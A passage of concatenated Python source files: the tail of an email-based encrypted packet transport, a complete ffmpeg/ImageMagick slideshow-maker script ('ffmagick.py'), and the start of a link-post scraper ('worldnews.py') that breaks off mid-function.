self.__try_process_packet(message): seens.append(uid) if seens: self.__store.add_flags(seens, [imapclient.SEEN]) def _process_packet_connected(self, sid: int, context: socket_context.Connected, packet: Packet): secure = isinstance(context, socket_context.SecureConnected) with context.cv: if secure: packet: SecurePacket context: socket_context.SecureConnected packet = packet.decrypt(context.ratchet, context.xeddsa) packet: PlainPacket for ack_seq, ack_attempt in packet.acks: self.__process_ack(context, ack_seq, ack_attempt) if packet.seq != -1 and packet.seq >= context.recv_cursor[0]: # no action for pure ack and duplicated packets context.pending_remote[packet.seq] = packet.payload context.to_ack.add((packet.seq, packet.attempt)) self._schedule_ack(sid, context) seq, off = context.recv_cursor while context.pending_remote.get(seq) == b'': del context.pending_remote[seq] seq += 1 off = 0 context.recv_cursor = seq, off if context.pending_remote.get(seq): self._socket_update_ready_status(sid, 'read', True) elif secure and packet.seq == 0: # handshake response del context.attempts[0] del context.pending_local[0] context.syn_seq = None context.cv.notify_all() return True def __try_process_packet_connected(self, packet: Packet, secure: bool) -> bool: with self._mutex: sid = self._connected_sockets.get((packet.to, packet.from_)) try: context: socket_context.Connected = self._socket_check_status(sid, socket_context.Connected) except Exception: return False if secure != isinstance(context, socket_context.SecureConnected): return False return self._process_packet_connected(sid, context, packet) def __try_process_packet_listening(self, packet: Packet, secure: bool) -> bool: with self._mutex: sid = next((sid for sid, listening_endpoint in self._listening_sockets.items() if listening_endpoint.matches(packet.to)), None) try: context: socket_context.Listening = self._socket_check_status(sid, socket_context.Listening) except Exception: return False with context.cv: conn_sid = context.connected_sockets.get((packet.to, packet.from_)) if conn_sid is not None: # existing pending connection conn_context = context.sockets[conn_sid] if secure != isinstance(conn_context, socket_context.SecureConnected): return False conn_context.pending_packets.append(packet) elif packet.is_syn: # new connection conn_sid = self._socket_allocate_id() context.queue.append(conn_sid) context.connected_sockets[(packet.to, packet.from_)] = conn_sid self._socket_update_ready_status(sid, 'read', True) context.cv.notify_all() if secure: packet: SecurePacket conn_context = socket_context.SecureConnected( packet.to, packet.from_) else: conn_context = socket_context.Connected( packet.to, packet.from_) conn_context.pending_packets.append(packet) context.sockets[conn_sid] = conn_context else: return False return True @staticmethod def __try_parse_packet(msg: email.message.Message) -> Optional[Tuple[Packet, bool]]: with contextlib.suppress(Exception): return PlainPacket.from_message(msg), False with contextlib.suppress(Exception): return SecurePacket.from_message(msg), True return None def __try_process_packet(self, message: Dict[bytes, Any]) -> bool: msg = email.message_from_bytes(message[b'BODY[]']) ret = self.__try_parse_packet(msg) return ret and bool(self.__try_process_packet_connected(*ret) or self.__try_process_packet_listening(*ret)) # TODO: check the seq range of packet # TODO: check if duplicated attempts of a packet are same def __process_ack(self, context: socket_context.Connected, seq: int, attempt: int): total_attempts = context.attempts.get(seq) if total_attempts is None: # duplicated ack return del context.pending_local[seq] context.to_ack -= context.sent_acks[(seq, attempt)] for i in range(total_attempts): del context.sent_acks[(seq, i)] del context.attempts[seq]
ffmagick.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Simple slideshow maker. The following external tools are needed: - ffmpeg - imagemagick (convert, mogrify, montage) - mkvtoolnix (mkvmerge) """ import multiprocessing as mp import os import shutil import subprocess import sys import time from argparse import ArgumentParser from datetime import date from imghdr import what from itertools import cycle, tee from random import randint from tempfile import gettempdir from threading import Thread from xml.sax.saxutils import escape __version__ = '0.1' DEFAULT_FONT = 'Cooper-Black' if os.name == 'nt' else 'DejaVu-Sans-Book' _P = cycle(r'\|/-') _exe = '.exe' if os.name == 'nt' else '' EXT = ('tiff', 'jpeg', 'bmp', 'png') AUDIO_EXT = ('.wav', '.ogg', '.mp3', '.m4a', '.aac') EXECUTABLES = { 'ffmpeg': 'ffmpeg', 'convert': 'convert', 'mogrify': 'mogrify', 'montage': 'montage', 'mkvmerge': 'mkvmerge', } TAGFILE_CONTENT = """\ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE Tags SYSTEM "matroskatags.dtd"> <Tags> <Tag> <Simple> <Name>DESCRIPTION</Name> <String>{epilog}</String> </Simple> <Simple> <Name>DATE_RELEASED</Name> <String>{date}</String> </Simple> <Simple> <Name>COMMENT</Name> <String>Created with ffmagick slideshow maker.</String> </Simple> <Simple> <Name>COPYRIGHT</Name> <String>{author}</String> </Simple> </Tag> </Tags> """ BUILDFILE_CONTENT = """\ # -*- coding: utf-8 -*- from ffmagick import slideshow, recurse, recurse_audio # Put your images and/or image directories here. If you have subfolders, # which should be included, use the `recurse` function provided. # Example: IMAGES = [ # '/home/user/mypic.jpg', # recurse('/home/user/fotos'), # '/home/user/myfolder', # ] # On Windows use raw strings (r'C:\\Users\\user\\pictures') or forward # slashes ('C:/Users/user/pictures'). IMAGES = [] # Put your audio files and/or directories here. If you have subfolders, # which should be included, use the `recurse_audio` function provided. # Example: AUDIO = [ # '/home/user/song.mp3', # recurse_audio('/home/user/music'), # '/home/user/audiofolder' # ] # On Windows use raw strings (r'C:\\Users\\user\\music') or forward # slashes ('C:/Users/user/music'). AUDIO = [] # Output profile for your show. # Available profiles: DVD (720x576, 30Hz) # 720p (1280x720, 60Hz) # 1080p (1920x1080, 60Hz) # UHD (3840x2160, 60Hz) # 4k (4096x2304, 60Hz) PROFILE = '1080p' # Time to display each image in seconds. IMAGE_DURATION = 5 # Time for the transition between two images in seconds. TRANSITION_DURATION = 1 # Set your font here. Run `python ffmagick.py list_fonts` for a list of # supported fonts of your platform. The best way is to give an absolute # path to a .ttf file here. System fonts can be used without path. # On Windows use raw strings (r'C:\\windows\\fonts\\coopbl.ttf') or # forward slashes ('C:/windows/fonts/coopbl.ttf'). FONT = '{font}' # Title for your slideshow TITLE = '' # Author of the slideshow AUTHOR = '' # Text shown at the end of the show. Use `\\n` as newline even on Windows. EPILOG = '' # Background color for text and around the images after resizing. BACKGROUND = 'black' # Color for title and epilog text. TEXTCOLOR = 'white' # Working directory for temporary files (for a show with 4 pictures about # 120MB free space is needed) # If None (the default) your systems temporary directory is used. WORKDIR = None # Mapping for the needed external programs if not in your PATH. EXECUTABLES = {{ 'convert': r'convert{exe}', 'montage': r'montage{exe}', 'mogrify': r'mogrify{exe}', 'ffmpeg': r'ffmpeg{exe}', 'mkvmerge': r'mkvmerge{exe}', }} # Remove all temporary files after slideshow is finished. # If set to True, the needed HD space is much less. Images then will be # removed right after small movie creation. REMOVE_TEMPFILES = True # Filename for your created slideshow. OUTPUT = r'{out}' if __name__ == '__main__': slideshow( IMAGES, AUDIO, remove_tempfiles=REMOVE_TEMPFILES, output=OUTPUT, profile=PROFILE, image_duration=IMAGE_DURATION, transition_duration=TRANSITION_DURATION, font=FONT, title=TITLE, author=AUTHOR, epilog=EPILOG, background=BACKGROUND, textcolor=TEXTCOLOR, workdir=WORKDIR, executables=EXECUTABLES, ) """.format(font=DEFAULT_FONT, exe=_exe, out=os.path.join(os.getcwd(), 'slideshow.mkv')) class Profile: def __init__(self, width, height, fps, fontsize=None): self.width = width self.height = height self.fps = fps self.fontsize = fontsize @property def size(self): return (self.width, self.height) @property def montage_width(self): return self.width // 2 @property def montage_height(self): return self.height // 2 @property def montage_size(self): return (self.montage_width, self.montage_height) PROFILES = { 'dvd': Profile(720, 576, 30, 48), '720p': Profile(1280, 720, 60, 80), '1080p': Profile(1920, 1080, 60, 80), 'uhd': Profile(3840, 2160, 60, 80), '4k': Profile(4096, 2304, 60, 80), } class Base: def __init__(self, workdir, executables, outfile=None): workdir = workdir or gettempdir() _name = 'ffmagick-{}-'.format(self.__class__.__name__) self.tmp = _get_name(workdir, _name) os.mkdir(self.tmp) self.exe = EXECUTABLES.copy() if executables: self.exe.update(executables) self.outfile = outfile self.process_time = None self._automate = [] def __iter__(self): start = time.time() for desc, func in self._automate: _start = time.time() func() yield desc, time.time() - _start self.process_time = time.time() - start def cleanup(self): shutil.rmtree(self.tmp) class VideoBuilder(Base): def __init__(self, pictures, profile=PROFILES['1080p'], title='', background='black', textcolor='white', font=DEFAULT_FONT, workdir=None, author='', epilog='', executables=None, image_duration=5, transition_duration=1, remove_tempfiles=True): Base.__init__(self, workdir, executables) self.source_pictures = _get_pictures(pictures) self.pictures = [] self.first = None self.last = None self._last_num = None self.anim_nums = [] self.profile = profile self.title = title self.background = background self.textcolor = textcolor self.font = font self.author = author self.epilog = epilog self.image_duration = image_duration self.transition_duration = transition_duration self.remove_tempfiles = remove_tempfiles self.dirs = dict( pics=os.path.join(self.tmp, 'pictures'), anim_pics=os.path.join(self.tmp, 'animation_pictures'), movs=os.path.join(self.tmp, 'movies'), ) for d in self.dirs.values(): os.mkdir(d) self._automate = ( ('Copied source files to workdir', self.copy_source_files), ('Created first picture with fade-in', self.create_first_picture), ('Created last picture with fade-out', self.create_last_picture), ('Resized pictures according to profile', self.resize_pictures), ('Created animation pictures', self.create_anim_pictures), # ('Created movies for pictures', self.create_small_movies), # ('Created movies for transitions', # self.create_transition_movies), ('Created small movies', self.create_movies), ('Created video only MKV file', self.create_video_only_mkv), ) def copy_source_files(self): i = 3 for pic in self.source_pictures: dest = os.path.join(self.dirs['pics'], 'pic-{:>06d}.jpg'.format(i)) cmd = [self.exe['convert'], pic, '-auto-orient', dest] subprocess.check_call(cmd) self.pictures.append(dest) i += 2 self._last_num = i def create_first_picture(self): if len(self.pictures) < 4: raise ValueError('You must at least have 4 pictures in your show!') nums = _get_sample_numbers(len(self.pictures)) pics = [self.pictures[x] for x in nums] _out = os.path.join(self.dirs['pics'], 'pic-000001.jpg') if self.title: out = os.path.join(self.tmp, 'title_raw.jpg') else: out = _out cmd = [self.exe['montage'], '-tile', '2x'] cmd.extend(pics) cmd.extend([ '-geometry', '{}x{}+10+50'.format( self.profile.montage_width, self.profile.montage_height ), '-background', self.background, out ]) subprocess.check_call(cmd) if self.title: cmd = [self.exe['convert'], out, '-gravity', 'center', '-font', self.font, '-pointsize', str(self.profile.fontsize), '-fill', self.textcolor, '-draw', "text 0,0 '{}'".format(self.title), _out] subprocess.check_call(cmd) self.first = _out def create_last_picture(self): w, h = self.profile.size text = [] now = date.today() if not self.author and not self.epilog: text.append('Build with ffmagick {}'.format(now.year)) else: if self.author: text.append('\xa9 {} {}'.format(now.year, self.author)) if self.epilog: text.append(self.epilog) out = os.path.join(self.dirs['pics'], 'pic-{:>06d}.jpg'.format(self._last_num)) cmd = [self.exe['convert'], '-size', '{}x{}'.format(w, h), '-background', self.background, '-fill', self.textcolor, '-font', self.font, '-pointsize', str(self.profile.fontsize), '-gravity', 'center', 'label:{}'.format('\n'.join(text)), out] subprocess.check_call(cmd) self.last = out def resize_pictures(self): # start = time.time() size = '{}x{}'.format(*self.profile.size) pics = [self.first] + self.pictures + [self.last] for pic in pics: cmd = [self.exe['mogrify'], '-resize', size, '-background', 'black', '-gravity', 'center', '-extent', size, pic] subprocess.check_call(cmd) def create_anim_pictures(self): pics = [self.first] + self.pictures + [self.last] i = 2 frames = self.profile.fps * self.transition_duration - 2 for pic1, pic2 in _pairwise(pics): d = os.path.join(self.dirs['anim_pics'], 'morph-{:>06d}'.format(i)) full = os.path.join(d, '%03d.jpg') os.mkdir(d) cmd = [self.exe['convert'], pic1, pic2, '-morph', str(frames), full] self.anim_nums.append(i) subprocess.check_call(cmd) i += 2 def create_small_movies(self): self._create_first_movie() # length = len(self.pictures) for pic in self.pictures: _name = os.path.basename(pic) name, _ = os.path.splitext(_name) out = os.path.join(self.dirs['movs'], 'mov-{}.mp4'.format(name)) cmd = [self.exe['ffmpeg'], '-loop', '1', '-i', pic, '-c:v', 'libx264', '-t', str(self.image_duration), '-r', str(self.profile.fps), '-pix_fmt', 'yuv420p', out] subprocess.check_call(cmd, stderr=subprocess.DEVNULL) if self.remove_tempfiles: os.remove(pic) self._create_last_movie() def create_transition_movies(self): anims = os.listdir(self.dirs['anim_pics']) anims.sort() for folder in anims: num = folder.split('-')[1] inp = os.path.join(self.dirs['anim_pics'], folder, '%03d.jpg') out = os.path.join(self.dirs['movs'], 'mov-pic-{}.mp4'.format(num)) cmd = [self.exe['ffmpeg'], '-r', str(self.profile.fps), '-i', inp, '-c:v', 'libx264', '-vf', 'fps={},format=yuv420p'.format(self.profile.fps), out] subprocess.check_call(cmd, stderr=subprocess.DEVNULL) if self.remove_tempfiles: shutil.rmtree(os.path.join(self.dirs['anim_pics'], folder)) def create_movies(self): p = Thread(target=self.create_small_movies) p.start() self.create_transition_movies() p.join() def create_video_only_mkv(self): opts = os.path.join(self.tmp, 'video_only.txt') out = os.path.join(self.tmp, 'video_only.mkv') files = [os.path.join(self.dirs['movs'], x) for x in os.listdir(self.dirs['movs'])] files.sort() tags_file = self._create_tags_file() with open(opts, 'w', encoding='utf-8') as fp: fp.write('-o\n{}\n'.format(out.replace('\\', '/'))) if self.title: fp.write('--title\n') fp.write('{}\n'.format(self.title)) fp.write('--global-tags\n') fp.write('{}\n\n'.format(tags_file.replace('\\', '/'))) fp.write('{}\n'.format(files[0].replace('\\', '/'))) for f in files[1:]: fp.write('+{}\n'.format(f.replace('\\', '/'))) cmd = [self.exe['mkvmerge'], '@{}'.format(opts)] subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) self.outfile = out def _create_tags_file(self): out = os.path.join(self.tmp, 'tags.xml') dt = date.today() text = TAGFILE_CONTENT.format( epilog=escape(self.epilog), author=escape(self.author), date=dt.strftime('%Y-%m-%d') ) with open(out, 'w', encoding='utf-8') as fp: fp.write(text) return out def _create_first_movie(self): duration = self.image_duration + 2 tmp_out = os.path.join(self.tmp, 'first.mp4') cmd = [self.exe['ffmpeg'], '-loop', '1', '-i', self.first, '-c:v', 'libx264', '-t', str(duration), '-r', str(self.profile.fps), '-y', '-pix_fmt', 'yuv420p', tmp_out] subprocess.check_call(cmd, stderr=subprocess.DEVNULL) out = os.path.join(self.dirs['movs'], 'mov-pic-000001.mp4') cmd = [self.exe['ffmpeg'], '-i', tmp_out, '-y', '-vf', 'fade=in:0:{}'.format(self.profile.fps * 2), out] subprocess.check_call(cmd, stderr=subprocess.DEVNULL) def _create_last_movie(self): duration = self.image_duration + 2 begin = duration * self.profile.fps - 2 * self.profile.fps tmp_out = os.path.join(self.tmp, 'last.mp4') cmd = [self.exe['ffmpeg'], '-loop', '1', '-i', self.last, '-c:v', 'libx264', '-t', str(duration), '-r', str(self.profile.fps), '-y', '-pix_fmt', 'yuv420p', tmp_out] subprocess.check_call(cmd, stderr=subprocess.DEVNULL) _name = os.path.basename(self.last) name, _ = os.path.splitext(_name) out = os.path.join(self.dirs['movs'], 'mov-{}.mp4'.format(name)) cmd = [self.exe['ffmpeg'], '-i', tmp_out, '-y', '-vf', 'fade=out:{}:{}'.format(begin, self.profile.fps * 2), out] subprocess.check_call(cmd, stderr=subprocess.DEVNULL) class AudioBuilder(Base): def __init__(self, audio_files, workdir=None, executables=None): Base.__init__(self, workdir, executables) self.audio_files = _get_audio(audio_files) self.aac_files = [] self._automate = ( ('Transcoded audio files to AAC', self.transcode), ('Created audio only MKV file', self.create_audio_only_mkv), ) def transcode(self): for n, f in enumerate(self.audio_files, 1): out = os.path.join(self.tmp, 'audio-{:>03d}.aac'.format(n)) if f.lower().endswith('.aac') or f.lower().endswith('.m4a'): shutil.copy(f, out) else: cmd = [self.exe['ffmpeg'], '-i', f, '-c:a', 'aac', '-strict', '-2', '-b:a', '256k', out] subprocess.check_call(cmd, stderr=subprocess.DEVNULL) self.aac_files.append(out) self.aac_files.sort() def create_audio_only_mkv(self): self.outfile = os.path.join(self.tmp, 'audio_only.mkv') opts = os.path.join(self.tmp, 'audio_only.txt') sbr = '--aac-is-sbr\n1\n' with open(opts, 'w', encoding='utf-8') as fp: fp.write('-o\n{}\n'.format(self.outfile.replace('\\', '/'))) fp.write(sbr) fp.write('{}\n'.format(self.aac_files[0].replace('\\', '/'))) for f in self.aac_files[1:]: fp.write(sbr) fp.write('+{}\n'.format(f.replace('\\', '/'))) cmd = [self.exe['mkvmerge'], '@{}'.format(opts)] subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) class Muxer(Base): def __init__(self, video_file, audio_file, outfile, workdir=None, executables=None): Base.__init__(self, workdir, executables, outfile) self.video_file = video_file self.audio_file = audio_file self._counter = 1 def mux(self): if not os.path.isfile(self.audio_file): shutil.copy(self.video_file, self.outfile) return vid_dur = _get_duration(self.video_file, self.exe['ffmpeg']) aud_dur = _get_duration(self.audio_file, self.exe['ffmpeg']) while True: if aud_dur < vid_dur: self._double_audio() aud_dur = _get_duration(self.audio_file, self.exe['ffmpeg']) else: break out = os.path.join(self.tmp, 'audio-cut-%02d.mkv') cmd = [self.exe['mkvmerge'], '-o', out, '--split', 'timecodes:{}'.format(get_timecode(vid_dur)), self.audio_file] subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) self.audio_file = os.path.join(self.tmp, 'audio-cut-01.mkv') cmd = [self.exe['mkvmerge'], '-o', self.outfile, self.video_file, self.audio_file] subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) def _double_audio(self): out = os.path.join(self.tmp, 'audio-{:>02d}.mkv'.format(self._counter)) self._counter += 1 cmd = [self.exe['mkvmerge'], '-o', out, self.audio_file, '+', self.audio_file] subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) self.audio_file = out def _worker(builder, queue): for desc, t in builder: print(desc, '| Duration: {:.1f}s'.format(t)) queue.put(builder.outfile) def slideshow(pictures, audio_files=None, remove_tempfiles=True, output='slideshow.mkv', **kwargs): if 'profile' in kwargs and not isinstance(kwargs['profile'], Profile): kwargs['profile'] = PROFILES[kwargs['profile'].lower()] if not output.lower().endswith('.mkv'): output = '{}.mkv'.format(output) kwargs['remove_tempfiles'] = remove_tempfiles workdir = kwargs.get('workdir', None) executables = kwargs.get('executables', None) start = time.time() vbuilder = VideoBuilder(pictures, **kwargs) vqueue = mp.Queue(1) vprocess = mp.Process(target=_worker, args=(vbuilder, vqueue)) vprocess.start() if audio_files: abuilder = AudioBuilder(audio_files, workdir, executables) aqueue = mp.Queue(1) aprocess = mp.Process(target=_worker, args=(abuilder, aqueue)) aprocess.start() while True: if not vprocess.is_alive(): if audio_files and not aprocess.is_alive(): break print(next(_P), end='\r', file=sys.stderr, flush=True) time.sleep(0.2) video = vqueue.get() if audio_files: audio = aqueue.get() muxer = Muxer(video, audio, output, workdir, executables) muxer.mux() else: shutil.copy(video, output) if remove_tempfiles: print('Removing temporary files') vbuilder.cleanup() if audio_files: abuilder.cleanup() muxer.cleanup() duration = time.time() - start print('Duration of the whole process: {}'.format( get_timecode(duration, only_int=True) )) return output def recurse(folder): folder = os.path.abspath(folder) for root, _, files in os.walk(folder): for f in files: full = os.path.join(root, f) if what(full) in EXT: yield full def recurse_audio(folder): folder = os.path.abspath(folder) for root, _, files in os.walk(folder): for f in files: full = os.path.join(root, f) if os.path.splitext(f)[1].lower() in AUDIO_EXT: yield full def get_timecode(seconds, only_int=False): """Convert a number of seconds in a timecode (HH:MM:SS.ssss) which MKVMerge can handle. :parameters: seconds : Decimal The seconds to convert. only_int : bool If given, the returntype will be HH:MM:SS :returns: Timecode in the format HH:MM:SS.ssss :rtype: str """ minute, second = divmod(int(seconds), 60) hour, minute = divmod(minute, 60) second = seconds - minute * 60 - hour * 3600 if only_int: format_str = '{:0>2d}:{:0>2d}:{:0>2.0f}' else: format_str = '{:0>2d}:{:0>2d}:{:0>7.4f}' return format_str.format(hour, minute, second) def _progress(num, count=None): pass def _get_seconds(s): h, m, s = s.split(':') return int(h) * 3600 + int(m) * 60 + float(s) def _get_duration(filename, ffmpeg): cmd = [ffmpeg, '-i', filename] p = subprocess.Popen(cmd, stderr=subprocess.PIPE) dur = None for line in p.stderr: line = line.decode('utf-8').strip() if 'Duration' in line: tmp = line.split(',')[0] dur = tmp.split()[1] if dur is None: raise ValueError('No duration found for {}'.format(filename)) return _get_seconds(dur) def _get_name(dir_, prefix): root = os.path.abspath(dir_) num = 1 while True: name = os.path.join(root, '{}{:>03d}'.format(prefix, num)) if not os.path.exists(name): return name num += 1 def _pairwise(pictures): a, b = tee(pictures) next(b, None) return zip(a, b) def _get_sample_numbers(max_num): nums = set() while True: num = randint(0, max_num - 1) nums.add(num) if len(nums) == 4: return nums def _get_pictures(files_and_folders): files = [] for item in files_and_folders: if not isinstance(item, str): files.extend(list(item)) elif os.path.isfile(item): pic = os.path.abspath(item) if what(pic) in EXT: files.append(pic) elif os.path.isdir(item): root = os.path.abspath(item) for f in os.listdir(root): full = os.path.join(root, f) if what(full) in EXT: files.append(full) return files def _get_audio(files_and_folders): files = [] for item in files_and_folders: if not isinstance(item, str): files.extend(list(item)) elif os.path.isfile(item): f = os.path.abspath(item) ext = os.path.splitext(f)[1].lower() if ext in AUDIO_EXT: files.append(f) elif os.path.isdir(item): root = os.path.abspath(item) for f in os.listdir(root): full = os.path.join(root, f) ext = os.path.splitext(f)[1].lower() if ext in AUDIO_EXT: files.append(full) return files def paste_buildfile(args): with open(args.output, 'w', encoding='utf-8') as fp: fp.write(BUILDFILE_CONTENT) def print_fonts(args): p = subprocess.Popen( [args.convert, '-list', 'font'], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL ) fonts = [] default_font_found = False for line in p.stdout: line = line.decode('utf-8').strip() if 'Font:' in line: font = line.split()[1].strip() fonts.append(font) if font == DEFAULT_FONT: default_font_found = True p.wait() print('') count = len(fonts) + 1 for f in fonts: print(' *', f) found = '(not found on your system)' if not default_font_found else '' print(' ** Default font:', DEFAULT_FONT, found) print('') print('Found {} fonts.'.format(count)) print('') def find_progs(args): print('') print('Looking for ImageMagick') for prog in ('convert', 'montage', 'mogrify'): p = shutil.which(prog) print(' * {}: {}'.format(prog, p or 'not found')) print('') print('Looking for ffmpeg') p = shutil.which('ffmpeg') print(' * ffmpeg: {}'.format(p or 'not found')) print('') print('Looking for mkvtoolnix') p = shutil.which('mkvmerge') print(' * mkvmerge: {}'.format(p or 'not found')) print('') print('If one or more components are not found, install them or give ' 'the full path to the executables in your buildfile or on the ' 'commandline.') print('') def _get_file(filename): with open(filename, encoding='utf-8') as fp: return fp.read() def _get_audio_from_file(filename): tracks = [] with open(filename, encoding='utf-8') as fp: for f in fp: f = f.strip() if not f: continue if f.startswith('+'): tracks.append(recurse_audio(f[1:].strip())) else: tracks.append(f) return tracks def _get_images_from_file(filename): images = [] with open(filename, encoding='utf-8') as fp: for f in fp: f = f.strip() if not f: continue if f.startswith('+'): images.append(recurse(f[1:].strip())) else: images.append(f) return images def _slideshow(args): args = vars(args) _audio = args.pop('audio_files') audio_files = [] for f in _audio: if f.startswith('+'): audio_files.append(recurse_audio(f[1:])) elif f.startswith('@'): audio_files.extent(_get_audio_from_file(f[1:])) else: audio_files.append(f) _img = args.pop('images') images = [] for f in _img: if f.startswith('+'): images.append(recurse(f[1:])) elif f.startswith('@'): images.extent(_get_images_from_file(f[1:])) else: images.append(f) for k in ('title', 'epilog'): if args[k].startswith('@'): args[k] = _get_file(args[k][1:]) args['executables'] = { 'convert': args.pop('convert'), 'montage': args.pop('montage'), 'mogrify': args.pop('mogrify'), 'ffmpeg': args.pop('ffmpeg'), 'mkvmerge': args.pop('mkvmerge'), } del args['version'] del args['func'] print(args) # return slideshow(images, audio_files, **args) def main(): _convert = 'convert.exe' if os.name == 'nt' else 'convert' _montage = 'montage.exe' if os.name == 'nt' else 'montage' _mogrify = 'mogrify.exe' if os.name == 'nt' else 'mogrify' _ffmpeg = 'ffmpeg.exe' if os.name == 'nt' else 'ffmpeg' _mkv = 'mkvmerge.exe' if os.name == 'nt' else 'mkvmerge' p = ArgumentParser( description='Create slideshows with transitions, title slide and ' 'music from any number of images as MKV file.', prog='ffmagick', epilog='Needed external software: ImageMagick, ffmpeg, mkvmerge' ) p.add_argument('--version', action='store_true', default=False, help='Print version info and exit') subparsers = p.add_subparsers(title='Actions') p_fonts = subparsers.add_parser( 'list_fonts', help='List fonts known by your convert program', aliases=['lf'] ) p_fonts.add_argument('--convert', default=_convert, help='Path to ' 'convert(.exe) binary (default: %(default)s)') p_fonts.set_defaults(func=print_fonts) p_progs = subparsers.add_parser( 'list_progs', help='Try to find the needed external programs and ' 'list them', aliases=['lp'] ) p_progs.set_defaults(func=find_progs) p_build = subparsers.add_parser( 'buildfile', help='Create a default buildfile in the current working ' 'directory or at a location given with the -o option', aliases=['bf'] ) p_build.add_argument('-o', '--output', default='ffmagick_build.py', help='Name of the buildfile (default: %(default)s)') p_build.set_defaults(func=paste_buildfile) p_slide = subparsers.add_parser( 'slideshow', help='Build a slideshow with the given parameters', epilog='You can prefix the values for title and epilog with an @ ' 'to indicate that the value is a file.', aliases=['sl'] ) p_slide.add_argument('images', nargs='+', help='Give all your images/' 'image folders here. Prefix folders with a + to ' 'indicate that they should be searched recursive. ' 'If prefixed with an @ values are read from file ' '(one per line)') p_slide.add_argument('-a', '--audio-files', nargs='+', default=[], help='Give all your audio files/folders here. Prefix ' 'folders with a + to indicate that they should be ' 'searched recursive. If prefixed with an @ values ' 'are read from file (one per line)') p_slide.add_argument('-p', '--profile', choices=list(PROFILES.keys()), default='1080p', help='Output profile (default: ' '%(default)s)') p_slide.add_argument('--image-duration', type=int, default=5, help='Duration for an image to show in seconds ' '(default: %(default)s)') p_slide.add_argument('--transition-duration', type=int, default=1, help='Duration for the transition effect between ' 'two images in seconds (default: %(default)s)') p_slide.add_argument('-f', '--font', default=DEFAULT_FONT, help='Give a fontname or an absolute path to a ' '.ttf file here (default: %(default)s)') p_slide.add_argument('-t', '--title', default='', help='Title for the ' 'slideshow (shown on the first slide)') p_slide.add_argument('-A', '--author', default='', help='Author of the ' 'slideshow (shown on the last slide).') p_slide.add_argument('-e', '--epilog', default='', help='Epilog for the ' 'slideshow (shown on the last slide, use `\\n` for ' 'linebreaks)') p_slide.add_argument('--background', default='black', help='Color behind text and images (default: ' '%(default)s)') p_slide.add_argument('--textcolor', default='white', help='Color for ' 'text (default: %(default)s)') p_slide.add_argument('-w', '--workdir', default=None, help='Directory ' 'for temporary files. If not given, the default ' 'temporary directory of your system is used') p_slide.add_argument('-r', '--remove-tempfiles', action='store_false', default=True, help='Clean temporary files and ' 'directories when all work is done (default: ' '%(default)s)') p_slide.add_argument('-o', '--output', default='slideshow.mkv', help='Name (and path) for the final output file ' '(default: %(default)s)') p_slide.add_argument('--convert', default=_convert, help='Path to ' 'convert(.exe) binary (default: %(default)s)') p_slide.add_argument('--montage', default=_montage, help='Path to ' 'montage(.exe) binary (default: %(default)s)') p_slide.add_argument('--mogrify', default=_mogrify, help='Path to ' 'mogrify(.exe) binary (default: %(default)s)') p_slide.add_argument('--ffmpeg', default=_ffmpeg, help='Path to ' 'ffmpeg(.exe) binary (default: %(default)s)') p_slide.add_argument('--mkvmerge', default=_mkv, help='Path to ' 'mkvmerge(.exe) binary (default: %(default)s)') p_slide.set_defaults(func=_slideshow) args = p.parse_args() if args.version: print('ffmagick version {}'.format(__version__)) sys.exit() args.func(args) if __name__ == '__main__': main()
worldnews.py
import re from bs4 import BeautifulSoup from bs4 import SoupStrainer import os import httplib2 from multiprocessing import Pool c=0 import requests from datetime import datetime import multiprocessing from multiprocessing import current_process import time import os import sys FORMAT = '%d-%m-%Y %H:%M:%S' def make_soup(s): match=re.compile('https://|http://|www.|.com|.in|.org|gov.in') if re.search(match,s): while(True): try: http = httplib2.Http() break except: continue while(True): try: status, response = http.request(s) break except: continue while(True): try: page = BeautifulSoup(response,"html.parser",parse_only=SoupStrainer('div')) break except: continue return page else: return None def test_internet(): while(True): try: http = httplib2.Http() status, response = http.request("https://www.google.com") break except: continue def parse1(s): global c temp_set=set() soup=make_soup(s) if(soup!=None): for div in soup.find_all('div',class_=[ "thing" , "id-t3_3ua12m" ,"linkflair" , "linkflair-normal" , "odd" , "link"]): try: if(div.p!=None and div.p.next_sibling!=None and div.p.next_sibling.next_sibling!=None): x=div.p.next_sibling.next_sibling.next_sibling['class'] if(x[0]=='entry'): element='\nPROMPT '+str(c+1)+'\n' if(div.p.next_sibling.next_sibling.next_sibling!=None and div.p.next_sibling.next_sibling.next_sibling.p!=None and div.p.next_sibling.next_sibling.next_sibling.p.a!=None): element=element+div.p.next_sibling.next_sibling.next_sibling.p.a.string+'\n' element=element+div.p.next_sibling.next_sibling.next_sibling.p.a['href']+'\n' if(div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'})!=None and div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).time!=None): element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).time['datetime']+'\t' element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).time['title']+'\t' element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).time.string+'\n' if(div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'})!=None and div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).a!=None): element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).a.string+'\n' element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).text+'\n' if(div.div.find('div',{'class':'score likes'})!=None): element=element+'score likes '+div.div.find('div',{'class':'score likes'}).string+'\t' element=element+'score dislikes '+div.div.find('div',{'class':'score dislikes'}).string+'\t' element=element+'score unvoted '+div.div.find('div',{'class':'score unvoted'}).string+'\n\n' f.write(element) c=c+1 elif(x[0]=='thumbnail'): element='\nPROMPT '+str(c+1)+'\n' if(div.find('div',{'class':'entry unvoted'})!=None and div.find('div',{'class':'entry unvoted'}).p!=None and div.find('div',{'class':'entry unvoted'}).p.a!=None and div.find('div',{'class':'entry unvoted'}).p.a.string!=None): 